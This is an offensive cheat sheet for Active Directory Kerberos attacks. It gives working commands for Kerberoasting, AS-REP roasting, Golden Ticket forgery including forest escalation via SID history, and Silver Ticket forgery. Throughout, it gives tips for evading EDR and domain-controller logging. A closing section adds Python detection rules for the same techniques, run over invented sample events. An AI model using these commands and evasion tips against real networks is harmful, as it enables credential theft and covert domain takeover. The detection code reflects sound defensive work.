Kerberos Attacks
Credential OPSEC
Kerberoasting, AS-REP, Golden/Silver/Diamond Ticket
Kerberoasting (TGS-REQ Extraction)
Request TGS tickets for accounts that carry an SPN and crack them offline. Stay off the EDR's radar by using native Windows/.NET methods instead of dropping tooling, and by not downgrading to RC4 where the account supports AES.
Do not roast every user at once: that produces a large spike in Event 4769 on the DC. Work only against specific targets, and spread requests out (Rubeus has /delay and /jitter for this).
PowerShell / Bash
# [Native LotL] Find user accounts that have an SPN (PowerView)
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# [Native .NET] Request a TGS without Rubeus touching disk.
# GetRequest() returns the AP-REQ bytes that carry the encrypted ticket; the
# ticket also lands in the LSA ticket cache (klist), from where it can be exported.
Add-Type -AssemblyName System.IdentityModel
$tgs = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `
    -ArgumentList "MSSQLSvc/sql.domain.local:1433"
$tgs.GetRequest()
# [Rubeus] One named target only (OPSEC). By default Rubeus asks for an RC4 (etype 23)
# ticket; /aes requests AES where the account supports it (slower to crack, but no
# visible downgrade in 4769).
.\Rubeus.exe kerberoast /user:svcSQL /nowrap /outfile:hashes.txt
# Offline cracking: -m 13100 is for RC4 tickets ($krb5tgs$23$);
# AES-128 / AES-256 tickets ($krb5tgs$17$ / $krb5tgs$18$) need -m 19600 / -m 19700
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule --force
AS-REP Roasting
Request an AS-REP for accounts that have Kerberos pre-authentication disabled (DONT_REQ_PREAUTH) and crack the encrypted part offline. No prior privileges are needed: with network reach to a DC and a list of candidate usernames this works without any domain credential at all. Only the LDAP enumeration in the PowerView/Rubeus lines below needs a domain context; the Impacket line does not.
PowerShell / Bash
# [PowerView] Find vulnerable accounts
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
# [Rubeus] Get the AS-REP hash. The default output is john format;
# /format:hashcat produces the $krb5asrep$23$ form that hashcat -m 18200 expects
.\Rubeus.exe asreproast /user:TargetUser /format:hashcat /nowrap /outfile:asrep_hashes.txt
# [Impacket] Remote extraction without domain membership: only a username list is needed
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt
# Offline cracking
hashcat -m 18200 asrep_hashes.txt wordlist.txt
Golden Ticket (TGT Forgery)
Forge a TGT with a compromised krbtgt key: complete and persistent domain control until krbtgt is rotated twice.
OPSEC rule: forge with the AES-256 krbtgt key, not the RC4/NT hash. An RC4-encrypted TGT in a domain where everything else is AES stands out at once, and so does an absurd lifetime; keep the ticket within the domain's default (10 hours). The DC still logs every service ticket you request with the forged TGT (Event 4769), so what a SOC hunts for is 4769 activity for an account and host that never produced a matching 4768.
PowerShell
# AES-256 Golden Ticket forgery, injected into the current logon session
.\Rubeus.exe golden /aes256:KRBTGT_AES_KEY /domain:domain.local `
    /sid:DOMAIN_SID /user:Administrator /ptt
# [Forest Compromise] SID History (Child-to-Parent Trust Abuse): add the parent's
# Enterprise Admins SID (S-1-5-21-<parent domain>-519) as an extra SID; works because
# SID filtering is not enforced on intra-forest trusts
.\Rubeus.exe golden /aes256:CHILD_KRBTGT_AES /domain:child.domain.local `
    /sid:CHILD_SID /sids:PARENT_ENTERPRISE_ADMIN_SID /user:Administrator /ptt
Silver Ticket (TGS Forgery)
Forge a service ticket for one specific service using that service account's key. There is no exchange with the DC at all; the only traffic is between the attacker and the target host.
The quietest of the ticket attacks from the DC's point of view: nothing is logged there. Everything is logged on the target instead (4624/4672 logons with the forged account name, and a PAC validation request to the DC if the service is configured to verify the PAC), so "no logs" holds only for the DC.
PowerShell
# AES-256 Silver Ticket for CIFS (SMB file shares). For cifs/host on a member
# server the service key is the computer account's (TARGET$) AES key.
.\Rubeus.exe silver /aes256:SERVICE_AES_KEY /domain:domain.local `
    /sid:DOMAIN_SID /user:Administrator `
    /service:cifs/target.domain.local /ptt
# Service classes by goal: cifs (SMB), host (scheduled tasks; also needed together
# with rpcss for WMI and with http/wsman for WinRM)
OPSEC Notes & Telemetry Matrix
| Technique | Detection Risk | EDR / DC Telemetry | OPSEC Mitigation |
|---|---|---|---|
| Kerberoast (all users) | High | Event 4769: burst of TGS requests from one account for many different SPNs. | Named targets only; native .NET classes; delay and jitter between requests. |
| Kerberoast (RC4) | High | Event 4769 with Ticket Encryption Type 0x17 (RC4) for an AES-capable account. | Request AES tickets (crack with -m 19700); the RC4 downgrade is spotted immediately. |
| AS-REP Roast | Medium | Event 4768 with Pre-Authentication Type 0 (TGT issued without pre-auth). | Blends into traffic from legacy applications that have pre-auth disabled anyway. |
| Golden Ticket (RC4) | Critical | 4769 activity with no preceding 4768 for that account/host; RC4 etype in an AES domain; abnormal ticket lifetime. | AES-256 krbtgt key; lifetime within the domain default (10 hours). |
| Silver Ticket | Low | Nothing on the DC. | Detection only on the target host (4624/4672 with the forged account, PAC validation). |
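The telemetry column above reads as a detection spec, so here it is turned into code: an example added here, not part of the original page, that runs four rules over constructed Security-log events reduced to the fields the rules need (field names follow the 4768/4769 event XML: TargetUserName, ServiceName, IpAddress, TicketEncryptionType, PreAuthType). The sample events, accounts and addresses are invented for the example. The rules cover the 4769 burst of an untargeted Kerberoast, the 0x17 RC4 downgrade, 4768 with Pre-Authentication Type 0, and service-ticket activity with no AS exchange behind it, which is the hole a forged TGT leaves.

```python
"""Detection rules for the OPSEC telemetry matrix, run over constructed sample events.
Added example, not from the original page; sample data is invented, not real telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta


def _acct(name: str) -> str:
    """4768 logs 'bob', 4769 logs 'bob@DOMAIN.LOCAL': normalise both to 'bob'."""
    return name.split("@")[0].lower()


# Constructed sample: one quiet user, one account roasting six SPNs in a burst with
# RC4, one pre-auth-disabled account being AS-REP roasted, and one host presenting
# tickets for an account that never went through an AS exchange from that host.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": "2024-05-01T09:00:00", "TargetUserName": "jdoe", "IpAddress": "10.0.0.5",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:05", "TargetUserName": "jdoe@DOMAIN.LOCAL",
     "ServiceName": "FS01$", "IpAddress": "10.0.0.5", "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "Time": "2024-05-01T09:10:00", "TargetUserName": "bob", "IpAddress": "10.0.0.23",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    *[{"EventID": 4769, "Time": f"2024-05-01T09:10:{10 + i:02d}", "TargetUserName": "bob@DOMAIN.LOCAL",
       "ServiceName": svc, "IpAddress": "10.0.0.23", "TicketEncryptionType": "0x17"}
      for i, svc in enumerate(["svcSQL", "svcBackup", "svcIIS", "svcSCCM", "svcExch", "svcReport"])],
    {"EventID": 4768, "Time": "2024-05-01T09:12:00", "TargetUserName": "svc-legacy", "IpAddress": "10.0.0.23",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": "2024-05-01T09:20:00", "TargetUserName": "Administrator@DOMAIN.LOCAL",
     "ServiceName": "DC01$", "IpAddress": "10.0.0.99", "TicketEncryptionType": "0x12"},
]


def kerberoast_spikes(events, window=timedelta(minutes=5), threshold=5):
    """Accounts that obtained tickets for >= threshold distinct services inside `window`
    (the Event 4769 spike an untargeted roast produces). Returns {account: max distinct}."""
    by_acct = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769:
            by_acct[_acct(e["TargetUserName"])].append((datetime.fromisoformat(e["Time"]), e["ServiceName"]))
    hits = {}
    for acct, reqs in by_acct.items():
        reqs.sort()
        for i, (t_end, _) in enumerate(reqs):  # sliding window ending at each request
            services = {svc for t, svc in reqs[:i + 1] if t >= t_end - window}
            if len(services) >= threshold:
                hits[acct] = max(hits.get(acct, 0), len(services))
    return hits


def rc4_service_tickets(events):
    """4769 with etype 0x17 for a non-machine service account: the RC4 downgrade that
    default Rubeus/Impacket roasting requests. Machine accounts (name$) are excluded."""
    return [e for e in events
            if e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17"
            and not e["ServiceName"].endswith("$")]


def asrep_roast_candidates(events):
    """Accounts with a 4768 whose Pre-Authentication Type is 0: TGT issued without pre-auth."""
    return sorted({_acct(e["TargetUserName"]) for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0"})


def tgs_without_as(events):
    """(account, client IP) pairs with 4769 activity but no earlier 4768 from the same client
    in the data: the gap a forged TGT leaves. A hunting lead rather than an alert, since a
    TGT issued before the collection window looks identical."""
    seen_as, hits = set(), set()
    for e in sorted(events, key=lambda e: e["Time"]):
        key = (_acct(e["TargetUserName"]), e["IpAddress"])
        if e["EventID"] == 4768:
            seen_as.add(key)
        elif e["EventID"] == 4769 and key not in seen_as:
            hits.add(key)
    return hits
```

Run against the sample, the burst rule fires for bob (six distinct services in six seconds), the RC4 rule lists those same six tickets, the AS-REP rule names svc-legacy, and the last rule surfaces Administrator from 10.0.0.99 with service tickets but no AS-REQ. Against real Security logs, feed the rules the parsed EventData fields and widen the window and threshold to what your environment's baseline tolerates; the Silver Ticket row has no DC-side rule here because, as the matrix says, there is nothing on the DC to match.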